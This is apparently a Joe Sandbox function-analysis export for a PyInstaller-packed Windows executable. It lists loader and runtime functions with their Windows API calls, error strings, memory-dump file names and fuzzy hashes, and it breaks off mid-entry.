Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 403f487d16009621e611950588cee078c0f027d9c92fe24547de69073f600d01
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: C902A420E0DB27A1EE559F6DEC505B86365BF14785F4441B6EE2EC2260FF3CB58A8350

Function 00007FF6BA3A81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6BA3A86B7,?,?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A822C

Part of subcall function 00007FF6BA3A2810: MessageBoxW.USER32 ref: 00007FF6BA3A28EA

Strings

LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6BA3A82D9
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6BA3A8240
\, xrefs: 00007FF6BA3A8261
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6BA3A829D
CreateDirectory, xrefs: 00007FF6BA3A837C
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6BA3A8203
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6BA3A8373
%.*s, xrefs: 00007FF6BA3A830C

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction ID: 44c63cebad8f291ccd3b0504a1ed5e2fc3168f2a865abfc5fe4a7bbc9c259f30
Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
Instruction Fuzzy Hash: FB517021A2DA6291FF609B2DE8552BE63A2EF94780F4444B1EF4EC26D5FE3CE5058740

Function 00007FF6BA3A2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6BA3A21AB
SelectObject.GDI32 ref: 00007FF6BA3A21F2
DrawTextW.USER32 ref: 00007FF6BA3A2215
SelectObject.GDI32 ref: 00007FF6BA3A222B
ReleaseDC.USER32 ref: 00007FF6BA3A223B
MoveWindow.USER32 ref: 00007FF6BA3A228B
MoveWindow.USER32 ref: 00007FF6BA3A22CB
MoveWindow.USER32 ref: 00007FF6BA3A231E
MoveWindow.USER32 ref: 00007FF6BA3A2366

Strings

P%, xrefs: 00007FF6BA3A21FF

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 1bbb9a030e9cd5e1b7226f60d0ce1c917b999c91af7ede5880acc2d63f03158f
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 2E51D626608BB186D6249F26E4581BAB7A1F798B62F004135EFDEC3694EF3CD085DB10

Function 00007FF6BA3A80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6BA3A80FF
GetWindowLongPtrW.USER32 ref: 00007FF6BA3A817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6BA3A8192
GetLastError.KERNEL32 ref: 00007FF6BA3A819C
SetWindowLongPtrW.USER32 ref: 00007FF6BA3A81B3

Strings

Needs to remove its temporary files., xrefs: 00007FF6BA3A8185

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: ab9ab2aeca0955af9e50b44400376c0dd281076800e2608d19f9f39d0c93aeae
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 57215E21B09B9282EB458F7EEC54179A255EF89B91F5842B1DF2DC33D8EE2CD9918301

Function 00007FF6BA3B6290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B62D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B66C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B695C

Strings

p, xrefs: 00007FF6BA3B63FD
f, xrefs: 00007FF6BA3B63F5
-, xrefs: 00007FF6BA3B6369
:, xrefs: 00007FF6BA3B648C
p, xrefs: 00007FF6BA3B6385

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 995b986fa2bc530a268c0c6c8c70c7746d8f1f98b51ea4c9cbc478e9120973be
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 6412A372E0DA4386FB609A18D1546B97693FB90750FC84275EF99C6AC6DF3CE9C08B04

Function 00007FF6BA3B0FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B1008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B13D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B166F

Strings

f, xrefs: 00007FF6BA3B110A
p, xrefs: 00007FF6BA3B1112
p, xrefs: 00007FF6BA3B10AD
f, xrefs: 00007FF6BA3B1255
f, xrefs: 00007FF6BA3B10A0

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 8c27b6437f13957938516a7d95ec290f834523c6593082ac5e06af5676ee2df1
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 91127362E1C94386FB609A18E0547B976A3FB40750FD44277EF9AC6AC8DF7CE5848B10

Function 00007FF6BA3A1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6BA3A10CC
malloc, xrefs: 00007FF6BA3A110F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6BA3A11F6
fseek, xrefs: 00007FF6BA3A10D3
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6BA3A1098
fread, xrefs: 00007FF6BA3A11FD
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6BA3A1108

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
Instruction ID: ddd9ce5b82b5e67d2b8fe833a4eb0fd5dee940a530c7c2aa4600046e4a4623f0
Opcode Fuzzy Hash: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
Instruction Fuzzy Hash: 8B41C021B0866682EE10DB1AE8406BE6392FF44BC0F8445B3EF0DC7796EE3CE5468700

Function 00007FF6BA3A1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6BA3A14DE
malloc, xrefs: 00007FF6BA3A151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6BA3A15DF
fseek, xrefs: 00007FF6BA3A14E5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6BA3A149F
fread, xrefs: 00007FF6BA3A15E6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6BA3A1518

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
Instruction ID: 2dbd0267bc39c503077323a437b2cc46c28bb447a4b7e5bcb654a26f015fb296
Opcode Fuzzy Hash: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
Instruction Fuzzy Hash: E3419D32A08AA686EF10DF29E8401B96392FF44784F8445B2EF4DC7B95EE3CE5418704

Function 00007FF6BA3AEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6BA3AEA65

Part of subcall function 00007FF6BA3AF9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6BA3AF9FF
Part of subcall function 00007FF6BA3AF9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6BA3AFA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6BA3AEB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6BA3AED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6BA3AEE98

Strings

csm, xrefs: 00007FF6BA3AEAE6
csm, xrefs: 00007FF6BA3AEB60
csm, xrefs: 00007FF6BA3AEA7F

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: ea9230b47db99563a686b8970f9a434c8d928fa84b8169c817ba5e016dbbe272
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 75D17F32A08B618AEF209B69D4413AD77A1FB55788F200175EF8DD7B96DF38E495C700

Function 00007FF6BA3A2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
MessageBoxW.USER32 ref: 00007FF6BA3A2D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF6BA3A2D70
Error, xrefs: 00007FF6BA3A2D8C
[PYI-%d:ERROR] , xrefs: 00007FF6BA3A2CA6
%ls: , xrefs: 00007FF6BA3A2D22

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: c283634f10ea9c9b3aad7e49e69224c42e9663f61968a2266fcf15f34fb443d6
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 1D31E832708B5142EB209B69F8542AA7796BF88798F414136EF4DD7769EF3CD546C300

Function 00007FF6BA3ADCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD4D
GetLastError.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD85
FreeLibrary.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADDF3
GetProcAddress.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADDFF

Strings

api-ms-, xrefs: 00007FF6BA3ADD6D

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: 5a3d4ed180d81392a6cf4a3dafeded7478e206175eca9272761dd2187bd56e02
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: BF31A421B1A76291EE129B1AE8006B973A5FF48BE4F594575DF5ECB384EF3CE4448300

Function 00007FF6BA3A6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6BA3A6456
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6BA3A63C7
LoadLibrary, xrefs: 00007FF6BA3A64AE
ucrtbase.dll, xrefs: 00007FF6BA3A63DD
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6BA3A6407
Failed to load Python DLL '%ls'., xrefs: 00007FF6BA3A64A7

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction ID: d4ae6c1f5732abe56ea102d3ee9fa16a361613dadb982520e3734562492fd192
Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction Fuzzy Hash: BB41A131A18AA691EF10DB69E8551ED6316FF44384F800172EF5CC36A6EF3CE645C340

Function 00007FF6BA3A2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6BA3A351A,?,00000000,00007FF6BA3A3F23), ref: 00007FF6BA3A2AA0

Strings

0, xrefs: 00007FF6BA3A2B16
WARNING, xrefs: 00007FF6BA3A2AAF
Warning [ANSI Fallback], xrefs: 00007FF6BA3A2B0F
Warning, xrefs: 00007FF6BA3A2B1E
[PYI-%d:%s] , xrefs: 00007FF6BA3A2AA8

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: a8182a23c13780e6401c92c9fd7fc8c48b500facf54e986c4a195ee16457a5a2
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 37217F32A19B9192E7209B59F8817EA6394BB88784F404176EF8DC3659EF7CD1858740

Function 00007FF6BA3BB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6BA3BB15F
FlsGetValue.KERNEL32 ref: 00007FF6BA3BB174
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB195
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB1C2
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB1D3
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB1E4
SetLastError.KERNEL32 ref: 00007FF6BA3BB1FF

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction ID: 5dd915d36b36404ce86f70dc1682120da8bfa279304a69ed4c3c173e70c50d0f
